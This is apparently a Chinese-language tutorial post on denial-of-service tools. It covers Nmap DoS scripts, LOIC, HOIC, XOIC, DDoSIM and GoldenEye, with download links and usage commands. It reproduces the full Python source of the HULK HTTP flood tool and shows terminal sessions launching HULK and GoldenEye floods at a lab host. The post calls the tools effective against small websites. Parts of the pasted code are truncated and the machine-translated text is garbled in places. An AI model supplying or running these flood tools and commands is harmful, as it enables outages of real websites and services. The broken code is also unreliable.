拒绝服务攻击工具 Nmap - grep dos /usr/share/nmap/scripts/script.db | cut -d "\"" -f 2 |
root@K:~# cd /usr/share/nmap/scripts/
root@K:/usr/share/nmap/scripts# cat script.db | more
root@K:/usr/share/nmap/scripts# cat scirpt.db | grep dos
root@K:/usr/share/nmap/scripts# nmap -p445 --script=smb-vuln-regsvc-dos.nse 192.168.1.1
Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-05 08:08 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0037s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 14:75:90:21:4f:56 (Tp-link Technologies)
Nmap done: 1 IP address (1 host up) scanned in 0384 seconds
匿名者拒绝服务工具包 匿名者发布的Dos工具 - LOIC - HOIC - DDoSer 招募志愿者发放以上工具 以上Dos工具不隐藏真是IP地址 |
卢瓦(LOIC) (Low Orbit Ion Canon)
LOTC是一个最受欢迎的DOS攻击工具。 这个工具被去年流行的黑客集团匿名者用于对许多大公司的网络攻击。
它可以通过使用单个用户执行DOS攻击小型服务器,工具非常易于使用,即便你是一个初学者。 这个工具执行DOS攻击通过发送UDP,TCP或HTTP请求到受害者服务器。 你只需要知道服务器的IP地址或URL,其他的就交给这个工具吧
低轨道离子炮(LOIC)是一个开源的网站压力测试和抗拒绝服务测试工具,由C#语言开发。最初LOIC由Praetox科技开发,目前由开源社区维护。LOIC可以通过TCP或UDP洪水的方式形成拒绝服务攻击(DoS),因而可能打断业务正常运行,安全和测试人员在做评估网站压力测试时,请谨慎使用。 使用教程我记得我发过了自己在吧里找吧。
LOTC可以在linux系统上运行
HOIC不能再linux运行,能在windows运行
root@K:~# ifconfig
192.168.1.116
msfadmin@metasploitable:~$ ifconfig
192.168.1.119
HOIC不能再linux运行,能在windows运行
其他拒绝服务工具 XOIC - 攻击任意IP地址的指定端口 - git clone://git.code/sf.net/p/xoic/code xoic-code - http://xoicdoser.wordpress.com/ - 三种模式:test、normal、Dos Attack - 支持协议:TCP/HTTP/UDP/ICMP |
- git clone://git.code/sf.net/p/xoic/code xoic-code,这个下载链接已经空了,不能下载,另外找下载地址!
XOIC官网地址:http://xoicdoser.wordpress.com/,此链接里面的软件有恶意代码,建议不要下载!
XOIC是另一个不错的DOS攻击工具。它根据用户选择的端口与协议执行DOS攻击任何服务器。XOIC开发者还声称XOIC比上面的LOIC在很多方面更强大呢。
一般来说,该工具有三种攻击模式,第一个被称为测试模式,是非常基本的; 第二个是正常的DOS攻击模式; 最后一个是带有HTTP / TCP / UDP / ICMP消息的DOS攻击模式,。
对付小型网站来说,这是一个很有效的DDOS工具。 但是从来没有尝试的要小心点,你可能最终会撞自己的网站的服务器。
下载地址:https://sourceforge.net/projects/xoic/
其他拒绝服务工具 HULK - Http Unbearable Load King - Python脚本 - 随机产生大量唯一的地址请求,避免缓存命中 - 耗尽WEB服务器资源池 - https://packetstormsecurity.com/files/download/112856/hulk.zip |
下载地址:https://github.com/grafov/hulk
Hulk DoS tool
Hulk DoS tool 移植到Python语言。原来的Python工具由巴里Shteiman
http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/
我只是移植的实用程序是快速和肮脏的。原函数的名字是保持和原来的逻辑大多保持太。次要功能添加:
您可以设置用于请求的自定义线程数
还设置了程序(好的去功能)所使用的内核的数量
程序正确杀掉Ctl+C
此工具针对性的负载测试,并可能真的很糟糕配置的服务器。明智地使用它。
实例
$ hulk -site http://example.com/test/ 2>/dev/null
$ HULKMAXPROCS=4096 hulk -site http://example.com 2>/tmp/errlog
有用的环境变量:
它设置为你的CPU GOMAXPROCS或更高一些。
hulkmaxprocs限制连接池(默认为1024)。创建高负载使用更高的价值。
更多细节:http://siberian.laika.name/node/7
许可证
亚力山大一grafov [email protected]版权
原绿巨人实用权威巴里Shteiman(http:/ / sectorix。com)。没有任何引用许可源比它不是GPL。问作者关于许可证的原始效用。
走巨人牌工具版本。看到许可证。
# ----------------------------------------------------------------------------------------------
# HULK - HTTP Unbearable Load King
#
# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
# to their knees by exhausting the resource pool, its is meant for research purposes only
# and any malicious usage of this tool is prohibited.
#
# author : Barry Shteiman , version 1.0
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
request_counter+=1
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://' + host + '/')
return(headers_referers)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def usage():
print '---------------------------------------------------'
print 'USAGE: python hulk.py
print 'you can add "safe" after url, to autoshut after dos'
print '---------------------------------------------------'
#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', random.randint(110,120))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urllib2.urlopen(request)
except urllib2.HTTPError, e:
#print e.code
set_flag(1)
print 'Response Code 500'
code=500
except urllib2.URLError, e:
#print e.reason
sys.exit()
else:
inc_counter()
urllib2.urlopen(request)
return(code)
#http caller thread
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==500) & (safe==1):
set_flag(2)
except Exception, ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+100
print "%d Requests Sent" % (request_counter)
previous=request_counter
if flag==2:
print "\n-- HULK Attack Finished --"
#execute
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print "-- HULK Attack Started --"
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('http\://([^/]*)/?.*', url)
host = m.group(1)
for i in range(500):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
--------------------------------------------------------------------------------------
root@k:~# cd Desktop
root@k:~/Desktop# python hulk.py
----------------------------------------------------
USAGE: python hulk.py
you can add "safe" affter url, to autoshut after dos
----------------------------------------------------
root@k:~/Desktop# python hulk.py http://192.168.1.119
其他拒绝服务工具 DDoSIM - 7层拒绝服务工具(模拟多个僵尸机) - 随机IP地址 - 基于TCP连接的攻击 - 应用层DDoS攻击 - 正常的HTTP请求、非正常的HTTP请求式DDoS - SMTP DDos - 随机端口的TCP连接洪水 |
DDOSIM-Layer
DDOSIM是另一种流行的DOS攻击工具。 顾名思义,它是通过模拟控制几个僵尸主机执行DDOS攻击。所有僵尸主机创建完整的TCP连接到目标服务器。
这个工具是用c++写的,并且在Linux系统上运行。
这些是DDOSIM的主要特点:
模拟几个僵尸攻击
随机的IP地址
TCP-connection-based攻击
应用程序层DDOS攻击
HTTP DDos等有效的请求
与无效请求HTTP DDoS(类似于直流+ +攻击)
SMTP DDoS
TCP洪水连接随机端口
在这里下载DDOSIM: http://sourceforge.net/projects/ddosim/
其他拒绝服务工具 GoldenEye - http/https拒绝服务攻击工具 - 安全研究为目的的Python脚本 - 随机攻击向量,keep-alive,避免缓存命中 - wget https://github.com/jseidl/GoldenEye/archive/master.zip - unzip master.zip - ./goldeneye.py http://1.1.1.1 -w 50 |
黄金眼(GoldenEye )HTTP拒绝服务工具
黄金眼也是一个简单但有效的DOS攻击工具。 这是在Python测试开发的DOS攻击,但是人们也把它当做一种黑客工具了。
黄金眼
黄金是一个Python应用程序安全测试之用!
黄金是一个HTTP DoS测试工具。
攻击向量的剥削:HTTP keep-alive +非缓存
使用
USAGE: ./goldeneye.py
OPTIONS:
Flag Description Default
-u, --useragents File with user-agents to use (default: randomly generated)
-w, --workers Number of concurrent workers (default: 50)
-s, --sockets Number of concurrent sockets (default: 30)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-h, --help Shows this help
公用事业
工具/ getuas.py -切取用户代理列表从http://www.useragentstring.com/pages/useragentstring.php子页面(例如,/ getuas.py http://www.useragentstring.com/pages/browserlist/)需要beautifulsoup4
RES /列表/用户代理文本列表(每行一个)用户代理字符串(从http://www.useragentstring.com)
更新日志
2014-02-20添加随机生成的用户代理(还是RFC标准)。
2014-02-19删除无聊的查阅情况和用户代理。参考改进的随机性。添加外部用户代理列表支持。
2013-03-26从线程处理。仍然有一些错误解决像我还不知道如何propperly关机经理。
2012-12-09初始释放
做
从对argparse getopt
从字符串。format() printf一样
许可证
本软件是在GNU通用公共许可证3版下的分布式(GPLv3)
法律公告
本软件提供的教育用途!如果你从事任何非法活动,作者不承担任何责任。通过使用这个软件,你同意这些条款。
下载: http://packetstormsecurity.com/files/120966/GoldenEye-HTTP-Denial-Of-Service-Tool.html
root@k:~/Desktop# wget https://github.com/jseidl/GoldenEye/archive/master.zip //安装黄金眼
root@k:~/Desktop# unzip master.zip //解压
root@k:~/Desktop# cd GoldenEye-master/
root@k:~/Desktop/GoldenEye-master# ls
goldeneye.py README.md res util
root@k:~/Desktop/GoldenEye-master# python goldeneye.py
Please supply at least the URL
------------------------------------------------------------------------------------------------------
GoldenEye v2.1 by Jan Seidl
USAGE: ./goldeneye.py
OPTIONS:
FlagDescription Default
-u, --useragentsFile with user-agents to use (default: randomly generated)
-w, --workersNumber of concurrent workers (default: 10)
-s, --socketsNumber of concurrent sockets (default: 500)
-m, --methodHTTP Method to use 'get' or 'post' or 'random'(default: get)
-d, --debugEnable Debug Mode [more verbose output] (default: False)
-h, --helpShows this help
------------------------------------------------------------------------------------------------------
root@k:~/Desktop/GoldenEye-master# python goldeneye.py http://192.168.1.119 -w 50 -m random
GoldenEye v2.1 by Jan Seidl
Hitting webserver in mode 'random' with 50 workers running 500 connections each. Hit CTRL+C to cancel.